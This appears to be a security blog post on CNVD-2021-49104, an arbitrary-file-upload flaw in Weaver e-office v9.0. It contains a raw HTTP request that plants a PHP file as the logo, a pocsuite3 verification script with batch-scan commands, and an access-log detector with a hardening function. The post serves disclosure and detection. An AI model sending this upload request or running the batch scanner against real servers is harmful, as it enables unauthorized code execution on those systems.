Weaver E-Office file upload vulnerability (CNVD-2021-49104)
Introduction:
Weaver e-office is a standardised, easy-to-use, quickly deployable collaborative OA (office automation) product and one of the leading brands in China's collaborative OA market, offering enterprise users an OA system, mobile OA applications and related collaborative office solutions.
Vulnerability description
Weaver e-office is Weaver's standard collaborative mobile office platform.
CNVD-2021-49104: because e-office does not correctly handle user input in its upload module, an attacker can craft a malicious upload request and ultimately achieve arbitrary code execution on the server.
CVSS score for this vulnerability: 9.0; severity: high.
Cyberspace search engine query:
app="泛微-EOffice"
Affected versions:
Weaver e-office v9.0
Vulnerability reproduction
Vulnerable endpoint:
/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=
PoC (the original capture carries a PHPSESSID cookie; the post does not state whether a valid session is required, so test both with and without one):

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 127.0.0.1:7899
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Length: 193
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg

<?php phpinfo();?>
--e64bdf16c554bbc109cecef6451c26a4--
After the upload, request the shell at:
/images/logo/logo-eoffice.php
The handler stores the logo under a fixed name (logo-eoffice) but keeps the extension supplied in the multipart filename, so an upload named test.php is written as logo-eoffice.php in a web-reachable directory and is executed by PHP. A successful phpinfo() upload returns the usual phpinfo page on that path; each new upload overwrites the previous file.
pocsuite3 detection script
# -*- coding:utf-8 -*-
from urllib.parse import urljoin

from pocsuite3.api import Output, POCBase, register_poc, requests, logger, VUL_TYPE


class DemoPOC(POCBase):
    vulID = "CNVD-2021-49104"
    version = 'Weaver e-office v9.0'
    author = ["HADESI"]
    vulDate = "2020-12-15"
    createDate = "2021-11-30"
    updateDate = "2021-11-30"
    references = ["https://nosec.org/home/detail/4910.html"]
    name = "Weaver E-Office file upload vulnerability (CNVD-2021-49104)"
    appPowerLink = ''
    appName = 'Weaver E-Office'
    appVersion = 'v9.0'
    vulType = VUL_TYPE.UPLOAD_FILES
    desc = '''
    Weaver E-Office file upload vulnerability: the logo upload handler keeps the
    client-supplied extension, so a .php payload lands in a web-reachable path.
    '''
    samples = []
    install_requires = ['']

    def _verify(self):
        result = {}
        path = "/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId="
        boundary = "123123"
        headers = {'Content-Type': 'multipart/form-data; boundary=' + boundary}
        url = urljoin(self.url, path)
        # Hand-built multipart body with CRLF line endings (RFC 7578);
        # the filename extension is what ends up on the stored logo file.
        data = (
            '--' + boundary + '\r\n'
            'Content-Disposition: form-data; name="Filedata"; filename="1.php"\r\n'
            'Content-Type: image/jpeg\r\n'
            '\r\n'
            '<?php phpinfo(); ?>\r\n'
            '--' + boundary + '--\r\n'
        )
        shell_url = urljoin(self.url, '/images/logo/logo-eoffice.php')
        try:
            requests.post(url=url, headers=headers, data=data, timeout=5)
            # phpinfo() output always contains a "System" row, so use it as the marker
            resp = requests.get(url=shell_url, timeout=5)
            if "System" in resp.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['path'] = shell_url
        except Exception as e:
            logger.debug(str(e))
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        return self._verify()


register_poc(DemoPOC)
Single target: python cli.py -r pocs\2021\e-cology\20211202_WEB_E-Office_FileUpload.py -u http://ip:port --verify
Batch (one target per line in 1.txt): python cli.py -r pocs\2021\e-cology\20211202_WEB_E-Office_FileUpload.py -f 1.txt --verify
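The PoC above leaves two distinctive traces in the web server's access log: a POST to the logo upload handler with uploadType=eoffice_logo, followed by a GET for /images/logo/logo-eoffice.<ext> where <ext> is not an image extension. The following detector is an added example written for this page, not code from the original post or from Weaver. It assumes combined-format access logs (the sample lines are constructed) and an image-extension allow-list of my own choosing; safe_logo_name shows the server-side pattern that closes the hole (derive the stored extension from an allow-list, never from the client string) and is not Weaver's actual patch.

```python
"""Detect CNVD-2021-49104 exploitation in access logs (added example, constructed data)."""
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: extensions a logo upload may legitimately produce.
IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "bmp"}

UPLOAD_PATH = "/general/index/UploadFile.php"
LOGO_PATH_PREFIX = "/images/logo/logo-eoffice."

# Combined log format: ip ident user [ts] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample: one attacker session and one benign client.
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Dec/2021:10:15:01 +0800] "POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1" 200 57',
    '203.0.113.5 - - [02/Dec/2021:10:15:02 +0800] "GET /images/logo/logo-eoffice.php HTTP/1.1" 200 48213',
    '198.51.100.7 - - [02/Dec/2021:10:16:40 +0800] "GET /images/logo/logo-eoffice.png HTTP/1.1" 200 8841',
    '198.51.100.7 - - [02/Dec/2021:10:17:00 +0800] "GET /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo HTTP/1.1" 405 0',
    'garbage line that does not parse',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.groupdict()
    req["status"] = int(req["status"])
    return req


def is_logo_upload(req):
    """True for a POST to the logo upload handler with uploadType=eoffice_logo."""
    if req["method"] != "POST":
        return False
    parts = urlsplit(req["target"])
    if parts.path != UPLOAD_PATH:
        return False
    q = parse_qs(parts.query)
    return q.get("m") == ["uploadPicture"] and q.get("uploadType") == ["eoffice_logo"]


def logo_extension(req):
    """Extension requested under /images/logo/logo-eoffice.<ext>, lower-cased, or None."""
    path = urlsplit(req["target"]).path
    if not path.startswith(LOGO_PATH_PREFIX):
        return None
    return path[len(LOGO_PATH_PREFIX):].lower()


def find_exploits(lines):
    """Return (ip, stage, target) alerts.

    stage "upload"  : logo upload request (rare in normal use, worth reviewing)
    stage "webshell": successful fetch of logo-eoffice.<non-image extension>
    """
    alerts = []
    for line in lines:
        req = parse_line(line)
        if req is None:
            continue
        if is_logo_upload(req):
            alerts.append((req["ip"], "upload", req["target"]))
            continue
        ext = logo_extension(req)
        if ext is not None and ext not in IMAGE_EXTENSIONS and req["status"] == 200:
            alerts.append((req["ip"], "webshell", req["target"]))
    return alerts


def safe_logo_name(client_filename):
    """Hardened naming pattern: the stored extension comes only from the allow-list.

    Returns the file name to store, or None if the upload must be rejected.
    """
    ext = client_filename.rsplit(".", 1)[-1].lower() if "." in client_filename else ""
    if ext not in IMAGE_EXTENSIONS:
        return None
    return "logo-eoffice." + ext


if __name__ == "__main__":
    for alert in find_exploits(SAMPLE_LOG):
        print("%s %-8s %s" % alert)
```

Alert on the "webshell" stage with high confidence; the "upload" stage alone is a lead to correlate with the same client IP. After confirming, pull /images/logo/logo-eoffice.* from disk for forensics before it is overwritten by a later upload.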
This article represents the author's independent view and may not be reproduced without permission; for authorization contact FreeBuf customer service (WeChat: freebee2022).